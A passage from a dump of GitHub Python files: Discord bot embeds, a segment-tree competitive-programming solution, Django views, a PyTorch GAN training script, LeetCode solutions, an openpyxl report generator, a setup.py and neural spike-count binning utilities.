description=\"We are unloading your request to save resources. If you want to continue, please use the command again.\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n\n return embed\n\n\nasync def no_more_pictures_embed() -> discord.Embed:\n embed = discord.Embed(\n title=\"No more pictures\",\n description=\"There are no more pictures available for this model\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n\n return embed\n\n\nasync def generated_image_embed(image_data) -> discord.Embed:\n embed = discord.Embed(\n title=\"AI Image Generation\",\n description=\"Those are the parameters used to generate the image\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n embed.add_field(name=\"Prompt\", value=image_data[\"params\"][\"prompt\"])\n embed.add_field(name=\"Negative Prompt\", value=image_data[\"params\"][\"prompt\"])\n embed.add_field(name=\"Seed\", value=image_data[\"params\"][\"seed\"], inline=True)\n embed.add_field(\n name=\"CFG scale\", value=image_data[\"params\"][\"cfg_scale\"], inline=True\n )\n embed.add_field(\n name=\"Generation steps\", value=image_data[\"params\"][\"steps\"], inline=True\n )\n embed.add_field(\n name=\"Sampler\", value=image_data[\"params\"][\"sampler_name\"], inline=True\n )\n embed.add_field(\n name=\"Model\",\n value=image_data[\"params\"][\"options\"][\"sd_model_checkpoint\"],\n inline=True,\n )\n\n return embed\n","repo_name":"alexandreteles/coomer_bot","sub_path":"views/embeds.py","file_name":"embeds.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36010342309","text":"import sys\ninput = sys.stdin.readline\n\ndef init(s, e, i):\n if s == e: seg[i] = arr[s]\n else:\n m, ch = (s + e) >> 1, i << 1\n seg[i] = init(s, m, ch) + init(m + 1, e, ch + 1)\n return seg[i]\n\ndef summ(s, e, l, r, i):\n if lz[i]: propagation(s, e, i)\n if r < s or l > e: return 0\n if l <= s and e <= r: return seg[i]\n m, ch = (s + e) >> 1, i << 1\n return summ(s, m, l, r, ch) + summ(m + 1, e, l, r, ch + 1)\n\ndef update(s, e, l, r, i, d):\n if lz[i]: propagation(s, e, i)\n if e < l or r < s: return\n if s == e: seg[i] += d\n elif l <= s and e <= r:\n ch = i << 1\n seg[i] += (e - s + 1) * d\n lz[ch] += d\n lz[ch + 1] += d\n else:\n m, ch = (s + e) >> 1, i << 1\n update(s, m, l, r, ch, d)\n update(m + 1, e, l, r, ch + 1, d)\n seg[i] = seg[ch] + seg[ch + 1]\n\ndef propagation(s, e, i):\n ch = i << 1\n seg[i] += (e - s + 1) * lz[i]\n if s != e:\n lz[ch] += lz[i]\n lz[ch + 1] += lz[i]\n lz[i] = 0\n\n\nN, M = map(int, input().split())\narea, arr = {}, [0]\n\nx, y, d = map(int, input().split())\nif x <= y:\n for i in range(x, y + 1): area[i] = 1\n arr.append(d)\nelse:\n for i in range(y, N + 1): area[i] = 1\n for i in range(1, x + 1): area[i] = 1\n arr.append(d)\n\nfor m in range(2, M + 1):\n x, y, d = map(int, input().split())\n for i in range(x, y + 1): area[i] = m\n arr.append(d)\n\nseg = [0] * (1 << (M.bit_length() + 1))\nlz = seg[:]\ninit(1, M, 1)\n\nwhile 1:\n cmd = tuple(map(int, input().split()))\n if cmd[0] == 0: break\n if cmd[0] == 1:\n if area[cmd[1]] <= area[cmd[2]]:\n sys.stdout.write(str(summ(1, M, area[cmd[1]], area[cmd[2]], 1)) + '\\n')\n else:\n sys.stdout.write(str(summ(1, M, area[cmd[1]], M, 1) + summ(1, M, 1, area[cmd[2]], 1)) + '\\n')\n else:\n if area[cmd[1]] <= area[cmd[2]]:\n update(1, M, area[cmd[1]], area[cmd[2]], 1, cmd[3])\n else:\n update(1, M, area[cmd[1]], M, 1, cmd[3])\n update(1, M, 1, area[cmd[2]], 1, cmd[3])\n\n# 비재귀 세그트리 구현해보기\n","repo_name":"abcworld123/practice","sub_path":"baekjoon/Platinum/[P4] 겨울나기.py","file_name":"[P4] 겨울나기.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15483124649","text":"from multiprocessing import context\nfrom django.shortcuts import render, HttpResponse,redirect\nfrom .models import *\nfrom django.contrib import messages\n\ndef root(request):\n return redirect(\"/shows\")\n\ndef index(request):\n context = {\n 'movies': Movie.objects.all(),\n }\n return render(request ,\"index.html\", context)\n\ndef create_new(request):\n return render(request, \"create.html\")\n\ndef add_new(request):\n errors = Movie.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('./new')\n else:\n newMovie = Movie.objects.create(\n title=request.POST['title'],\n network=request.POST['network'],\n release_date=request.POST['rel_date'],\n desc=request.POST['desc'],\n )\n newMovie.save()\n return redirect(\"Display\", id = newMovie.id)\n\ndef dis_show(request, id):\n context = {\n 'movie': Movie.objects.get(id = id),\n }\n return render(request, 'show.html', context)\n\ndef edit_show(request,id):\n context = {\n 'movie': Movie.objects.get(id=id),\n }\n return render(request, \"edit.html\", context)\n\ndef update_show(request, id):\n errors = Movie.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('./edit')\n else:\n update_movie = Movie.objects.get(id=id)\n update_movie.title= request.POST['title']\n update_movie.network= request.POST['network']\n update_movie.release_date= request.POST['rel_date']\n update_movie.desc= request.POST['desc']\n update_movie.save()\n return redirect(\"Display\", id = update_movie.id)\n\ndef del_show(request, id):\n movie_to_del = Movie.objects.get(id=id)\n movie_to_del.delete()\n return redirect(\"/shows\")","repo_name":"zahramughais/Semi_Restful_TV_Shows","sub_path":"Tv_Shows_App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35855142842","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 16 15:49:57 2023\r\n\r\n@author: Zack Amos\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport math\r\nimport torch\r\nfrom torch import nn\r\nimport matplotlib.pyplot as plt\r\n\r\ntrain_size = 1024\r\nhalfsize = int(train_size/2)\r\n\r\nsignal1 = torch.zeros((halfsize,2))\r\nsignal2 = torch.zeros((halfsize,2))\r\ntheta = torch.rand(train_size)*2.*math.pi\r\nr = 0.1\r\nsignal1[:,0] = r\r\nsignal1[:,1] = theta[:512]\r\n\r\nsignal2[:,0] = 2*r\r\nsignal2[:,1] = theta[:-512]\r\n\r\nlabels1 = torch.ones(halfsize,1)\r\nlabels2 = 2*torch.ones(halfsize,1)\r\n\r\nsignal = torch.cat((signal1, signal2))\r\nlabels = torch.cat((labels1, labels2))\r\nsignal = torch.cat((signal, labels),1)\r\n\r\ntrain_set = [torch.cat((signal[i], labels[i])) for i in range(train_size)]\r\n\r\n\r\n#plt.plot(signal[:,0],signal[:,1],\".\")\r\n#plt.show()\r\n\r\nbatch_size = 32\r\ntrain_loader = torch.utils.data.DataLoader(\r\n train_set, batch_size=batch_size, shuffle=True\r\n)\r\n\r\nclass Discriminator(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.model = nn.Sequential(\r\n nn.Linear(3, 256),\r\n nn.ReLU(),\r\n nn.Dropout(0.3),\r\n nn.Linear(256, 128),\r\n nn.ReLU(),\r\n nn.Dropout(0.3),\r\n nn.Linear(128, 64),\r\n nn.ReLU(),\r\n nn.Dropout(0.3),\r\n nn.Linear(64, 1),\r\n nn.Sigmoid(),\r\n )\r\n\r\n def forward(self, x):\r\n output = self.model(x)\r\n return output\r\n\r\ndiscriminator = Discriminator()\r\n\r\nclass Generator(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.model = nn.Sequential(\r\n nn.Linear(3, 16),\r\n nn.ReLU(),\r\n nn.Linear(16, 32),\r\n nn.ReLU(),\r\n nn.Linear(32, 2),\r\n )\r\n\r\n def forward(self, x):\r\n output = self.model(x)\r\n return output\r\n\r\ngenerator = Generator()\r\n\r\nlr = 0.0001\r\nnum_epochs = 101\r\nloss_function = nn.BCELoss()\r\n\r\nloss_list = np.empty((0,3))\r\n\r\noptimizer_discriminator = torch.optim.Adam(discriminator.parameters(), lr=lr)\r\noptimizer_generator = torch.optim.Adam(generator.parameters(), lr=lr)\r\n\r\ncounter = 0\r\n\r\n\r\n\r\n\r\nfor epoch in range(num_epochs):\r\n print(epoch)\r\n loader = enumerate(train_loader)\r\n loaderdict = dict(loader)\r\n for n, (real_samples, real_samples_labels) in enumerate(train_loader):\r\n print(n)\r\n # Data for training the discriminator\r\n radii = torch.cat((torch.ones(int(batch_size/2)),2*torch.ones(int(batch_size/2))))\r\n latent_space_samples = torch.randn((batch_size, 2))\r\n\t\t#generate samples with \r\n generated_samples = generator(torch.cat((latent_space_samples, [radii]),1))\r\n generated_samples_labels = torch.zeros((batch_size,1))\r\n all_samples = torch.cat((real_samples, generated_samples))\r\n all_samples_labels = torch.cat((real_samples_labels, generated_samples_labels))\r\n\r\n # Training the discriminator on real samples\r\n discriminator.zero_grad()\r\n output_discriminator = discriminator(all_samples)\r\n loss_discriminator = loss_function(output_discriminator, all_samples_labels)\r\n loss_discriminator.backward()\r\n optimizer_discriminator.step()\r\n\r\n # Data for and training of the generator\r\n radii = torch.cat((torch.ones(int(batch_size/2)),2*torch.ones(int(batch_size/2))))\r\n latent_space_samples = torch.randn((batch_size, 2))\r\n generated_samples = generator(torch.cat((latent_space_samples, [radii]),1))\r\n output_discriminator_generated = discriminator(generated_samples)\r\n loss_generator = loss_function(output_discriminator_generated, real_samples_labels)\r\n loss_generator.backward()\r\n optimizer_generator.step()\r\n \r\n \r\n loss_list = np.append(loss_list, [[counter, loss_generator.detach().numpy(), loss_discriminator.detach().numpy()]], axis=0)\r\n counter +=1\r\n # Show loss\r\n if epoch % 10 == 0 and n == batch_size - 1:\r\n print(f\"Epoch: {epoch} loss D: {loss_discriminator}\")\r\n print(f\"Epoch: {epoch} loss G: {loss_generator}\")\r\n \r\n plt.figure(figsize=(8,8))\r\n plt.subplot(2,2,1)\r\n plt.plot(loss_list[:,0], loss_list[:,1])\r\n plt.subplot(2,2,2)\r\n plt.plot(loss_list[:,0], loss_list[:,2])\r\n \r\n \r\n radii = torch.cat((torch.ones(int(batch_size/2)),2*torch.ones(int(batch_size/2))))\r\n latent_space_samples = torch.randn((batch_size, 2))\r\n generated_samples = generator(torch.cat((latent_space_samples, [radii]),1))\r\n generated_samples = generated_samples.detach()\r\n \r\n plt.subplot(2,2,3)\r\n plt.xlim(-0.25,0.25)\r\n plt.ylim(-0.25,0.25)\r\n sin = torch.sin(signal[:, 1])\r\n cos = torch.cos(signal[:, 1])\r\n x = torch.multiply(signal[:, 0],sin)\r\n y = torch.multiply(signal[:, 0],cos)\r\n plt.plot(x,y , \".\")\r\n \r\n \r\n plt.subplot(2,2,4)\r\n plt.xlim(-0.25,0.25)\r\n plt.ylim(-0.25,0.25)\r\n sin = torch.sin(generated_samples[:, 1])\r\n cos = torch.cos(generated_samples[:, 1])\r\n x = torch.multiply(generated_samples[:, 0],sin)\r\n y = torch.multiply(generated_samples[:, 0],cos)\r\n plt.plot(x,y , \".\")\r\n \r\n plt.savefig(f'images_polarcircle_{epoch}.png')\r\n plt.close('all')\r\n \r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"Zackmuons/RICH_GAN","sub_path":"polarcircle.py","file_name":"polarcircle.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72288671172","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def findHeight(self, root):\n if root == None: return 0\n return max(self.findHeight(root.left), self.findHeight(root.right)) + 1\n \n def findBottomLeftValue(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if root.left == None and root.right == None: return root.val\n left_height = self.findHeight(root.left)\n right_height = self.findHeight(root.right)\n if left_height >= right_height:\n return self.findBottomLeftValue(root.left)\n else:\n return self.findBottomLeftValue(root.right)\n ","repo_name":"JerryHu1994/LeetCode-Practice","sub_path":"Solutions/513-Find-Bottom-Left-Tree-Value/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19485381966","text":"import serial\nimport struct\n\nclass Bluetooth():\n DEVICE_FILE = '/dev/serial0'\n BAUDRATE = 115200\n\n def __init__(self):\n try:\n self._conn = serial.Serial(self.DEVICE_FILE, self.BAUDRATE)\n self._dummy = False\n print('Bluetooth')\n except serial.SerialException:\n self._conn = None\n self._dummy = True\n print('Dummy Bluetooth')\n\n def send(self, string):\n \"\"\"Send |string| as a series of characters. |string| should be\n alphabets, numbers and symbols which can be typed from your keyboard.\"\"\"\n if self._dummy:\n print('bluetooth: {}'.format(string))\n return\n self._conn.write(string)\n\n # See http://ww1.microchip.com/downloads/en/DeviceDoc/bluetooth_cr_UG-v1.0r.pdf\n # for detail.\n UART_CODES = {\n 'KEY_DELETE': 4,\n 'KEY_RIGHT': 7,\n 'KEY_BACKSPACE': 8,\n 'KEY_ENTER': 10,\n 'KEY_LEFT': 11,\n 'KEY_DOWN': 12,\n 'KEY_UP': 14,\n }\n\n def command(self, cmd):\n if cmd not in self.UART_CODES:\n print('Unknown Command: {}'.format(cmd))\n return\n if self._dummy:\n print('bluetooth: command({})'.format(cmd))\n return\n self.send(struct.pack('b', self.UART_CODES[cmd]))\n","repo_name":"google/mozc-devices","sub_path":"mozc-nazoru/src/nazoru/bluetooth.py","file_name":"bluetooth.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1830,"dataset":"github-code","pt":"44"} +{"seq_id":"36421134986","text":"class Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n ROWS, COLS, DIRS = len(grid), len(grid[0]), [[-1, 0], [1, 0], [0, -1], [0, 1]]\n q, fresh, time = deque(), 0, 0\n \n for r in range(ROWS):\n for c in range(COLS):\n if grid[r][c] == 2:\n q.append([0,r,c])\n elif grid[r][c] == 1:\n fresh += 1\n # BFS with time as 1st index and then row & column\n while q:\n time, cr, cc = q.popleft()\n for dr, dc in DIRS:\n r, c = cr + dr, cc + dc\n if (r < 0 or c < 0 or\n r == ROWS or c == COLS or\n grid[r][c] != 1):\n continue\n grid[r][c] = 2\n q.append([time + 1,r,c])\n fresh -= 1\n return time if not fresh else -1\n \n","repo_name":"HunterCLcode/leetcodeSolns","sub_path":"994-Rotting-Oranges.py","file_name":"994-Rotting-Oranges.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28906805683","text":"from openpyxl import Workbook, load_workbook\nfrom openpyxl.styles import Border, Side, PatternFill, Font, GradientFill, Alignment\n\nnewwb = Workbook()\nws = newwb.active\nnew_sheet = newwb.create_sheet(\"newSheet\")\n\nc_line=0; line_split = []; max_row=0; min_row=0; max=0; min=0;\n\nthin = Side(border_style=\"thin\", color=\"000000\")\ndouble = Side(border_style=\"double\", color=\"ff0000\")\nborder = Border(top=double, left=thin, right=thin, bottom=double)\nfill = PatternFill(\"solid\", fgColor=\"DDDDDD\")\nfill = GradientFill(stop=(\"000000\", \"FFFFFF\"))\nfont = Font(b=True, color=\"FF0000\")\nal = Alignment(horizontal=\"center\", vertical=\"center\")\n\nfile=open(\"sales-report.txt\", \"r\")\nws.cell(row=1, column=1).value = \"SALES REPORT\"\nws.cell(row=2, column=1).value = \"Name\"\nws.cell(row=2, column=2).value = \"State\"\nws.cell(row=2, column=3).value = \"Sales\"\n\nfor line in file:\n\tline_split.append(line.split(\"|\"))\n\tws.cell(row=c_line+3, column=1).value = line_split[c_line][0]\n\tws.cell(row=c_line+3, column=2).value = line_split[c_line][1]\n\tws.cell(row=c_line+3, column=3).value = float(line_split[c_line][2])\n\tws.cell(row=c_line+3, column=2).alignment = al\n\tws.cell(row=c_line+3, column=3).number_format = '#,##0.00'\n\tif c_line == 0:\n\t\tmax_row = c_line+3; min_row = c_line+3; \n\t\tmax = min = float(line_split[c_line][2]);\n\tif max < float(line_split[c_line][2]):\n\t\tmax = float(line_split[c_line][2]); max_row = c_line+3;\n\tif min > float(line_split[c_line][2]):\n\t\tmin = float(line_split[c_line][2]); min_row = c_line+3; \n\tc_line+=1\t\nfile.close()\n\ndef style_range(ws, cell_range, border=Border(), fill=None, font=None, alignment=None):\n \"\"\"\n Apply styles to a range of cells as if they were a single cell.\n\n :param ws: Excel worksheet instance\n :param range: An excel range to style (e.g. A1:F20)\n :param border: An openpyxl Border\n :param fill: An openpyxl PatternFill or GradientFill\n :param font: An openpyxl Font object\n \"\"\"\n\n top = Border(top=border.top)\n left = Border(left=border.left)\n right = Border(right=border.right)\n bottom = Border(bottom=border.bottom)\n\n first_cell = ws[cell_range.split(\":\")[0]]\n if alignment:\n ws.merge_cells(cell_range)\n first_cell.alignment = alignment\n\n rows = ws[cell_range]\n if font:\n first_cell.font = font\n\n for cell in rows[0]:\n cell.border = cell.border + top\n for cell in rows[-1]:\n cell.border = cell.border + bottom\n\n for row in rows:\n l = row[0]\n r = row[-1]\n l.border = l.border + left\n r.border = r.border + right\n if fill:\n for c in row:\n c.fill = fill\n\nws.row_dimensions[2].font = font\nws.column_dimensions[\"A\"].width = 20\nws.column_dimensions[\"B\"].width = 15\nws.column_dimensions[\"C\"].width = 15\nws.column_dimensions[\"A\"].alignment = al\n\nmaxFill = PatternFill(start_color='0000FF00', end_color='0000FF00', fill_type='solid')\nminFill = PatternFill(start_color='00FF0000', end_color='00FF0000', fill_type='solid')\nfor x in range(1,4):\n\tws.cell(row=2,column=x).font = font\n\tws.cell(row=2,column=x).alignment = al\n\tws.cell(row=max_row, column=x).fill = maxFill\n\tws.cell(row=min_row, column=x).fill = minFill\nstyle_range(ws, 'A1:C1', border=border, fill=fill, font=font, alignment=al)\nprint(\"\\n\\n\\n************************************************************\")\nprint(\"******** Importing records to Excel ..... ***********\")\nprint(\"************************************************************\")\nnewwb.save(\"sales-report.xlsx\")\nprint(\"\\n\\n\\nSales-report.xlsx Successfull Created\")\n","repo_name":"Samsonteo/Python_Tutorial","sub_path":"create excel.py","file_name":"create excel.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26835510896","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as readme:\n long_description = readme.read()\n\nsetuptools.setup(\n name = \"staticwebgen\",\n version = \"0.0.3\",\n author = \"OrangeBacon\",\n author_email = \"computer.backup.15@gmail.com\",\n description = \"A custom static site generator\",\n long_description = long_description,\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/OrangeBacon/staticwebgen\",\n license = \"MIT\",\n\n packages = [\"staticwebgen\"],\n entry_points = {\n 'console_scripts': [\"staticwebgen = staticwebgen.command_line:main\"]\n },\n install_requires = [\n \"watchdog\"\n ],\n\n classifiers = [\n \"Development Status :: 2 - Pre-Alpha\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Topic :: Software Development :: Code Generators\",\n \"Topic :: Internet\"\n ]\n)","repo_name":"OrangeBacon/staticwebgen","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31922925145","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io as sio\nfrom . import file_key as fk\nimport pickle\nimport os\nimport analysis_config\nfrom online_analysis import util_fcns\n\nimport sys\npy_ver = sys.version\n\nif '3.6.15' in py_ver:\n pkl_kw = dict(encoding='latin1')\nelif '2.7.8' in py_ver or '2.7.18' in py_ver:\n pkl_kw = dict()\n\n\ndef get_jeev_trials(filename, binsize=.1):\n try:\n dat = sio.loadmat(filename)\n except:\n ix = [j for i, j in enumerate(fk.filelist) if filename in j]\n assert(len(ix)==1)\n dat = sio.loadmat(ix[0])\n\n strobed = dat['Strobed']\n\n rew_ix = np.nonzero(strobed[:, 1]==9)[0]\n go_ix = rew_ix - 3\n ix = np.nonzero(strobed[go_ix, 1] == 5)[0]\n ix2 = np.nonzero(strobed[go_ix-1, 1] == 15)[0]\n ix_f = np.intersect1d(ix, ix2)\n\n rew_ix = rew_ix[ix_f]\n go_ix = go_ix[ix_f]\n\n # Make sure all 'go indices' 5s. \n assert np.sum(np.squeeze(strobed[go_ix, 1] - 5)) == 0\n\n times = list(zip(strobed[go_ix, 0], strobed[rew_ix, 0]))\n\n # Get decoder: \n ix = [i for i, j in enumerate(fk.filelist) if filename in j]\n\n # Get units\n assert(len(ix) == 1)\n decname = fk.decoderlist[ix[0]]\n dec = sio.loadmat(decname)\n unitlist = dec['decoder'][0]['predSig'][0][0]\n dat_units = [dat[k[0]] for i, k in enumerate(unitlist)]\n\n # Binning: \n bin_spk = _bin(times, dat_units, binsize)\n units_per = np.array([bs.shape[0] for i, bs in enumerate(bin_spk)])\n\n # Get Target info\n start_ix = strobed[go_ix - 3, 1]\n start_ix[start_ix == 400] = 2;\n start_ix[start_ix == 15] = 2;\n\n if np.sum(np.squeeze(start_ix - 2)) == 0:\n task = 'co'\n else:\n task = 'obs'\n\n if task == 'co':\n targ = strobed[go_ix - 2, 1]\n targ_ix = np.digitize(targ, fk.cotrialList) - 1\n assert np.sum(fk.cotrialList[targ_ix] - targ) == 0\n\n elif task == 'obs':\n targ = [strobed[g-4:g-1, 1] for i, g in enumerate(go_ix)]\n targ_ix = []\n for i, tg in enumerate(targ):\n tmp = np.tile(tg[np.newaxis, :], [len(fk.obstrialList), 1])\n ix = np.nonzero(np.sum(np.abs(fk.obstrialList - tmp), 1) == 0)[0]\n assert(len(ix)==1)\n targ_ix.append(ix[0])\n targ_ix = np.array(targ_ix)\n\n # Targ_ix, trial_ix\n targ_IX = []\n trial_IX = []\n for b, nb in enumerate(units_per):\n targ_IX.extend([targ_ix[b]]*nb)\n trial_IX.extend([b]*nb)\n\n # Decoder velocity outputs from AD 39/40 \n decoder_all = _bin_ad(times, dat, binsize)\n targ_i_all = []\n return bin_spk, targ_i_all, np.array(targ_IX), np.array(trial_IX), decoder_all\n\ndef get_jeev_trials_from_task_data(filename, include_pos = False, include_vel = False, binsize=.1, \n use_ITI=False, pre_go=0., get_ixs = False):\n\n if 'jeev082413_VFB_PPF_B100_NS5_NU20_Z1_assist_ofc_cont_cont_assist_ofc_fixData' in filename:\n start_index_overall = 55003\n else:\n start_index_overall = 0\n\n unbinned = dict()\n\n filelist_task = []\n for i, j in enumerate(fk.task_filelist):\n for k, l in enumerate(j):\n filelist_task.extend(l)\n try:\n dat = sio.loadmat(filename)\n except:\n ix = [j for i, j in enumerate(filelist_task) if filename in j]\n assert(len(ix)==1)\n try:\n dat = sio.loadmat(fk.task_directory+ix[0])\n except:\n dat = sio.loadmat(fk.task_directory_mbp+ix[0])\n\n strobed = make_strobed(dat, start_index_overall)\n\n rew_ix = np.nonzero(strobed[:, 1]==9)[0]\n go_ix = rew_ix - 3\n ix = np.nonzero(strobed[go_ix, 1] == 5)[0]\n ix2 = np.nonzero(strobed[go_ix-1, 1] == 15)[0]\n ix_f = np.intersect1d(ix, ix2)\n\n rew_ix = rew_ix[ix_f]\n go_ix = go_ix[ix_f]\n\n if use_ITI:\n go_ix = rew_ix.copy()\n rew_ix = rew_ix.copy() + 3 \n\n # Make sure all 'go indices' 5s. \n if use_ITI:\n assert np.sum(np.squeeze(strobed[go_ix, 1] - 9)) == 0\n else:\n assert np.sum(np.squeeze(strobed[go_ix, 1] - 5)) == 0\n \n ixs_og = list(zip(strobed[go_ix, 0], strobed[rew_ix, 0]))\n ixs = []\n\n # Ensure only indices > start_index_overall: \n for ii, (ji, ki) in enumerate(ixs_og):\n if np.logical_and(ji > start_index_overall, ki > start_index_overall):\n ixs.append((ji, ki))\n\n # Binning: \n spk_counts = dat['spike_counts'] # changed from 'spike_counts_all' to 'spike_counts', 2-7-19\n spk_counts_dt = float(dat['Delta_PPF'])\n assert spk_counts_dt == 0.005\n \n bin_spk, bin_spk_ub, exclude = _bin_spike_counts(ixs, spk_counts, spk_counts_dt, binsize, pre_go)\n unbinned['spike_counts'] = bin_spk_ub # changed from 'spike_counts_all' to 'spike_counts'\n units_per = np.array([bs.shape[0] for i, bs in enumerate(bin_spk)])\n unbinned_units_per = np.array([ix[1]-ix[0] for ix in ixs])\n\n # Get Target info\n start_ix = strobed[go_ix - 3, 1]\n start_ix[start_ix == 400] = 2;\n start_ix[start_ix == 15] = 2;\n\n if np.sum(np.squeeze(start_ix - 2)) == 0:\n task = 'co'\n else:\n task = 'obs'\n\n if task == 'co':\n targ = strobed[go_ix - 2, 1]\n targ_ix = targ - 64\n assert np.sum(fk.cotrialList[targ_ix] - targ) == 0\n\n elif task == 'obs':\n targ = [strobed[g-4:g-1, 1] for i, g in enumerate(go_ix)]\n targ_ix = []\n for i, tg in enumerate(targ):\n tmp = np.tile(tg[np.newaxis, :], [len(fk.obstrialList), 1])\n ix = np.nonzero(np.sum(np.abs(fk.obstrialList - tmp), 1) == 0)[0]\n if len(ix)==1:\n targ_ix.append(ix[0])\n else:\n targ_ix.append(-1)\n targ_ix = np.array(targ_ix)\n\n # Targ_ix, trial_ix\n targ_IX = []\n trial_IX = []\n for b, nb in enumerate(units_per):\n targ_IX.extend([targ_ix[b]]*nb)\n trial_IX.extend([b]*nb)\n\n targ_IX_UB = []\n for b, nb in enumerate(unbinned_units_per):\n targ_IX_UB.extend([targ_ix[b]]*nb)\n\n unbinned['target_ix'] = np.hstack((targ_IX_UB))\n\n if task == 'co':\n unbinned['target_loc'] = fk.targ_ix_to_loc(np.hstack((targ_IX_UB)))\n targ_i_all = fk.targ_ix_to_loc(np.array(targ_IX))\n elif task == 'obs':\n unbinned['target_loc'] = fk.targ_ix_to_loc_obs(np.hstack((targ_IX_UB)))\n targ_i_all = fk.targ_ix_to_loc_obs(np.array(targ_IX))\n\n # Decoder velocity outputs from AD 39/40 \n #try:\n decoder_all, decoder_all_ub = _bin_neural_push(ixs, filename, binsize, start_index_overall, pre_go)\n unbinned['neural_push'] = decoder_all_ub\n # #except:\n # import pdb; pdb.set_trace()\n # decoder_all = 0\n # unbinned['neural_push'] = 0\n unbinned['ixs'] = ixs\n unbinned['start_index_overall'] = start_index_overall\n \n if include_pos:\n cursor_kin = dat['cursor_kin']\n #import pdb; pdb.set_trace()\n print('Xlims: %.2f, %.2f'%(dat['horiz_min'][0, 0], dat['horiz_max'][0, 0]))\n print('Ylims: %.2f, %.2f'%(dat['vert_min'][0, 0], dat['vert_max'][0, 0]))\n bin_ck, ck = _bin_cursor_kin(ixs, cursor_kin, binsize, pre_go)\n print(len(bin_ck), bin_ck[0].shape)\n unbinned['cursor_kin'] = ck\n return bin_spk, targ_i_all, np.array(targ_IX), np.array(trial_IX), decoder_all, bin_ck, unbinned, exclude\n else:\n return bin_spk, targ_i_all, np.array(targ_IX), np.array(trial_IX), decoder_all, unbinned, exclude\n\ndef _bin(times, dat_units, binsize):\n bin_spk = []\n for i, (t0, t1) in enumerate(times):\n binedges = np.arange(t0, t1+binsize, binsize)\n X = np.zeros((len(binedges), len(dat_units) ))\n for u, unit in enumerate(dat_units):\n rel_ix = np.nonzero(np.logical_and(unit[:, 0] >= t0, unit[:, 0] < binedges[-1]))[0]\n ts = unit[rel_ix, 0]\n ts_dig = np.digitize(ts, binedges)\n for t, tsi_dig in enumerate(ts_dig):\n X[tsi_dig, u] += 1\n bin_spk.append(X)\n return bin_spk\n\ndef _bin_spike_counts(ixs, spike_counts, spk_counts_dt, binsize, pre_go):\n ''' pre_go_in seconds here...'''\n n_per_bin = int(binsize/spk_counts_dt)\n if pre_go is not None:\n pre_go_bins = int(pre_go/spk_counts_dt)\n else:\n pre_go_bins = 0\n\n exclude = []\n\n n_units = spike_counts.shape[0]\n bin_spk = []\n bin_spk_ub = []\n for i, (ix0, ix1) in enumerate(ixs):\n if ix0 > pre_go_bins:\n binedges = np.arange(ix0-pre_go_bins, ix1+n_per_bin, n_per_bin)\n X = np.zeros((len(binedges)-1, spike_counts.shape[0]))\n Xub = spike_counts[:, ix0-pre_go_bins:ix1]\n for b, bn in enumerate(binedges[:-1]):\n X[b, :] = np.sum(spike_counts[:, bn:binedges[b+1]], 1)\n else:\n exclude.append(i)\n X = np.zeros((1, spike_counts.shape[0]))\n bin_spk.append(X)\n bin_spk_ub.append(Xub)\n return bin_spk, bin_spk_ub, exclude\n\ndef _bin_cursor_kin(ixs, cursor_kin, binsize, pre_go = 0.):\n n_per_bin = int(binsize/.005)\n print(('Bin Curson kin Size %d' %(n_per_bin)))\n pre_go_bins = int( pre_go / .005 ); \n\n bin_ck = []\n ck = []\n z = np.zeros_like(cursor_kin[0, :])\n pos_vel = np.vstack((cursor_kin[0, :], z, cursor_kin[1, :], cursor_kin[2, :], z, cursor_kin[3, :], z+1.)).T\n for i, (ix0, ix1) in enumerate(ixs):\n binedges = np.arange(ix0-pre_go_bins, ix1+n_per_bin, n_per_bin)\n X = np.zeros((len(binedges)-1, pos_vel.shape[1]))\n Xub = pos_vel[ix0 - pre_go_bins:ix1, :]\n for b, bn in enumerate(binedges[:-1]):\n X[b, :] = np.sum(pos_vel[bn:binedges[b+1], :], 0)\n bin_ck.append(X)\n ck.append(Xub)\n return bin_ck, 